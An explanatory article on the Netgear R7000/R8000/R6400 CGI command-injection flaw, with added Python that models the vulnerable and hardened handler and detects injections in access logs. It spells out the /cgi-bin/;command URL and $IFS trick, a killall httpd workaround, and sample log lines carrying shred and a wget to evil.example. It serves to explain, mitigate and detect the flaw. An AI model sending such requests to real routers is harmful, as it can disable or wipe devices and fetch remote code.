A major vulnerability in several Netgear routers allowed remote attackers to commit command injection attacks on these devices. The attacks involved tricking victims using Netgear routers into visiting a malicious link -- but how can a bad link infect the actual router? How does this command injection attack work?
A security researcher took advantage of a major vulnerability in several high-end Netgear routers to show how command injection attacks were possible on the R8000, R7000 and R6400 models, as well as others.
The vulnerability was in the routers' embedded web server. Its CGI handler passed part of the requested URL to a shell without authenticating the client and without checking what that text contained, so a request for a path of the form /cgi-bin/;command ran the command on the router with the high privileges of the web server process. The attacker does not need to reach the router directly: the victim only has to open a web page, e-mail or link that references the router's LAN address, and the victim's own browser issues the request from inside the network. How badly the router is affected depends on the injected command. In the worst case, the HTML source of the page carries a link or image tag whose URL injects a shred command.
shred overwrites files before deleting them. Run against the router's file system, it leaves the device with nothing to work with and the router stops functioning. Another favourite of attackers is killall, which terminates every process with a given name; aimed at the web server, it leaves the router unable to accept requests for its administrative interface. Victims typically notice only after the fact, when they can no longer reach the router's web interface at all.
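To make the mechanism concrete, the following Python model is an added illustration (it is not code from the article and not Netgear's firmware): a CGI dispatcher that interpolates the request path into a shell command, the way a ';' in the URL ends the intended command and starts the attacker's, the $IFS trick that supplies the space the injected command needs, and a hardened dispatcher with the missing controls added. The /www/cgi-bin directory, the status.cgi allowlist and the echo payload are assumptions for the demo; injected text runs as whoever runs the script, so only a harmless echo is used.

```python
import re
import subprocess

# Assumed location of the CGI scripts; the real path is not given on the page.
CGI_DIR = "/www/cgi-bin"


def dispatch_vulnerable(request_path: str) -> str:
    """Model of the flawed handler: the text after /cgi-bin/ is concatenated
    into a command line and handed to sh -c, with no authentication and no
    validation. A ';' in the path therefore terminates the intended command
    (which fails harmlessly here) and the shell runs whatever follows.
    Returns what the shell printed on stdout."""
    script = request_path[len("/cgi-bin/"):]
    cmd = f"{CGI_DIR}/{script}"          # no validation, no quoting
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


# Only plain script names may reach the file system: no '/', ';', '$', quotes.
SAFE_NAME = re.compile(r"[A-Za-z0-9_.-]+")
ALLOWED_SCRIPTS = {"status.cgi"}      # assumed allowlist for the hardened version


def dispatch_hardened(request_path: str, authenticated: bool) -> str:
    """Same entry point with the three missing controls:
    1. require an authenticated session before touching CGI at all;
    2. accept only a known script name (allowlist plus character check);
    3. execute it as an argv list, never through a shell, so metacharacters
       in the path can never be interpreted."""
    if not authenticated:
        return "401 Unauthorized"
    script = request_path[len("/cgi-bin/"):]
    if not SAFE_NAME.fullmatch(script) or script not in ALLOWED_SCRIPTS:
        return "400 Bad Request"
    try:
        proc = subprocess.run([f"{CGI_DIR}/{script}"],
                              capture_output=True, text=True)
    except FileNotFoundError:
        return "404 Not Found"
    return proc.stdout


# The injected part of the PoC URL uses $IFS instead of a space: the shell
# expands $IFS to whitespace and word-splits on it, so "echo$IFS'pwned'" is
# executed as "echo pwned". The same trick turns killall$IFS'httpd' into
# "killall httpd".
INJECTED_PATH = "/cgi-bin/;echo$IFS'pwned'"

if __name__ == "__main__":
    print(repr(dispatch_vulnerable(INJECTED_PATH)))                    # 'pwned\n'
    print(dispatch_hardened(INJECTED_PATH, authenticated=True))        # 400 Bad Request
    print(dispatch_hardened("/cgi-bin/status.cgi", authenticated=False))  # 401 Unauthorized
```

The hardened dispatcher rejects the injected path before any process is spawned; the character check alone also blocks path traversal such as /cgi-bin/../../bin/sh, and the argv form means that even an allowlisted name is never re-parsed by a shell.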
The vulnerability was patched soon after the exploit was made public: Netgear released beta firmware updates for the affected routers, and US-CERT publicized a temporary fix so that users could keep using their routers in case the firmware did not update properly.
Until the firmware is updated, an ethical hacker can turn the same flaw against itself by injecting a "safe" command that stops the router's web server from accepting further requests. From a browser on the LAN, request the address http://[router-address]/cgi-bin/;killall$IFS'httpd', where [router-address] is the local IP address assigned to your router. $IFS is the shell's internal field separator variable; it expands to whitespace, which is why it stands in for the space between killall and its argument inside a URL. killall httpd terminates only the HTTP daemon, the background process that waits for incoming requests to the router's web interface, so the vulnerable code path is no longer reachable. The cost is that the administrative web interface is unavailable too. The effect lasts only until the router is rebooted: a reboot restarts httpd and restores the vulnerability, so the request has to be repeated after every restart until the patched firmware is installed.
To save typing the address each time, you can also put the same "ethical" command injection into the HTML source of a web page as a link; this is exactly the delivery mechanism an attacker would use, with a harmless payload in place of a destructive one.
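Because the defensive killall request and a hostile injection travel over the same URL shape, an administrator reviewing the router's (or a proxy's) access logs needs to tell them apart. The following Python is an added example, not from the article: it parses common-log-format lines, URL-decodes the path, flags any /cgi-bin/ request that carries shell metacharacters, and separates the known killall-httpd workaround from other payloads. The log lines, client addresses and the evil.example host are constructed for the demo.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic) in common log format.
# Line 3 shows the same injection with the metacharacters percent-encoded.
SAMPLE_LOG = """\
192.168.1.23 - - [10/Dec/2016:20:14:01 +0000] "GET /cgi-bin/;killall$IFS'httpd' HTTP/1.1" 200 0
192.168.1.23 - - [10/Dec/2016:20:15:44 +0000] "GET /cgi-bin/;shred$IFS-u$IFS/www/* HTTP/1.1" 200 0
192.168.1.7 - - [10/Dec/2016:20:16:02 +0000] "GET /cgi-bin/%3Bwget%24IFS%27http%3A//evil.example/x%27 HTTP/1.1" 200 0
192.168.1.7 - - [10/Dec/2016:20:17:30 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 512
192.168.1.9 - - [10/Dec/2016:20:18:11 +0000] "GET /index.html HTTP/1.1" 200 2048
"""

# client ident user [timestamp] "METHOD path protocol" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# Shell metacharacters that have no business in a CGI script name.
META_RE = re.compile(r"[;&|`$'\"<>(){}]")


def parse_line(line):
    """Return the fields of one log line, with the path URL-decoded, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, ts, method, path, status = m.groups()
    return {"client": client, "ts": ts, "method": method,
            "path": unquote(path), "status": int(status)}


def classify(path):
    """Classify a decoded request path.
    None             -> not a CGI request, or a plain script name
    ("workaround", p) -> the killall-httpd self-protection request
    ("injection", p)  -> any other injected command
    p is the injected text with $IFS turned back into spaces."""
    if not path.startswith("/cgi-bin/"):
        return None
    tail = path[len("/cgi-bin/"):]
    if not META_RE.search(tail):
        return None
    payload = tail.lstrip(";").replace("$IFS", " ")
    if payload.startswith("killall") and "httpd" in payload:
        return ("workaround", payload)
    return ("injection", payload)


def find_injections(log_text):
    """Scan a log and return one record per suspicious /cgi-bin/ request."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        verdict = classify(rec["path"])
        if verdict is not None:
            kind, payload = verdict
            hits.append({"client": rec["client"], "ts": rec["ts"],
                         "kind": kind, "payload": payload})
    return hits


if __name__ == "__main__":
    for hit in find_injections(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["client"]} {hit["kind"]:10s} {hit["payload"]}')
```

Decoding before matching matters: the third line would pass a naive search for the literal string ";killall" or "$IFS" because the attacker percent-encoded every metacharacter, yet the router's CGI handler sees the decoded path.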
Related Q&A from Judith Myerson